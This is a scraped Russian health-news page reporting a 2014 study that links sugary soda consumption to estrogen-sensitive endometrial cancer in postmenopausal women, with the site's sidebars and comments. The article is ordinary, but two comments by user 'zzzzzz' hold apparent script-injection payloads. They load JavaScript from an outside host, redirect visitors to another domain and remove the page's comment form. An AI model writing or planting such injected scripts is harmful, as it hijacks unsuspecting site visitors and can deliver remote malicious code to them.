Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Сладкие напитки вызывают ...  >>  Сладкие напитки вызывают рак матки
 
Обратная связь
 

Сладкие напитки вызывают рак матки

Размер шрифта
18 апреля 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Американские ученые выяснили нечто крайне неприятное для всех любителей сладкой газировки. Оказывается, сладкие газированные напитки не только добавят вам несколько лишних килограмм и сотрут в порошок эмаль ваших зубов, но и могут поспособствовать развитию самого распространенного варианта рака матки.

Сладкие напитки вызывают рак матки

У женщин в климаксе, которые пили много сладкой газировки, отмечался повышенный на 78% риск развития эстроген-чувствительного рака эндометрия I типа (эндометрий – это внутренняя оболочка матки). Данная закономерность имеет дозо-зависимый характер: чем больше сладких напитков вы пьете, тем выше риск.

«Несмотря на то, что мы впервые показали эту взаимосвязь, едва ли данное открытие можно назвать неожиданным», – рассказывает доктор Маки Ину-Чой, ведущий научный сотрудник подразделения эпидемиологии и общественного здоровья университета Миннесоты (США). «Ранее неоднократно было показано, что злоупотребление сладкой газировкой приводит к ожирению, а поскольку жировая ткань является местом продукции эстрогенов, неудивительно, что растет также и риск развития эстроген-чувствительных опухолей. Кроме того, у женщин с ожирением повышен уровень инсулина, что также является фактором риска для эндометриального рака».

Авторы подчеркивают, что поскольку данная научная работа стала первой в своем роде, необходимо проведение дополнительных исследований для подтверждения полученных результатов.

Доктор Ину-Чой и ее коллеги анализировали информацию, касающуюся 23 000 женщин в пост-менопаузе, которые принимали участие в монументальном эпидемиологическом исследовании «Исследование здоровья женщин штата Айова». В числе рассматриваемых параметров были состав и калорийность суточного рациона, демографические показатели, история болезни до момента диагноза эндометриального рака.

Для оценки суточного рациона использовался специальный опросник, разработанный в стенах Гарвардского университета. В нем присутствуют 127 позиций продуктов и представлена сравнительная шкала разовых порций.

Четыре вопроса данной анкеты затрагивают частоту употребления сладких газированных напитков.

Исследователи делят употребление газировки на несколько категорий, начиная с нуля и заканчивая шестьюдесятью банками в неделю.

В период с 1986 по 2010 годы у 506 женщин из числа испытуемых развился эндометриальный рак I типа, у 86 – II типа (эстроген-НЕчувствительный).
Авторы не нашли никаких корреляционных связей между случаями данных типов рака и употреблением несладких напитков и кондитерских изделий.

«Исследования показывают, что вклад сладкой газировки в распространение повальной эпидемии ожирения поистине огромен», – говорит Ину-Чой. «Чрезмерное количество добавочного сахара приводит к радикальному повышению общей суточной калорийности, что способствует усугублению всех медицинских рисков, в том числе и онкологических».

Другие секреты женского здоровья щедро раскрываются на страницах нашего одноименного спецпроекта.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:42

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:40

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Какой напиток не позволит вам ослепнуть?!   Узнайте, будет ли у вас рак в течение 10 лет   Как Анджелина Джоли изменила наш мир?   Может ли морковка в день избавить вас от рака груди?  
23 июля 2013Из лысых крыс сделают лекарство от рака 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Что можно и чего нельзя с изжогой?
Бронхит: лицом к лицу
Еда против рака. Часть 2

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.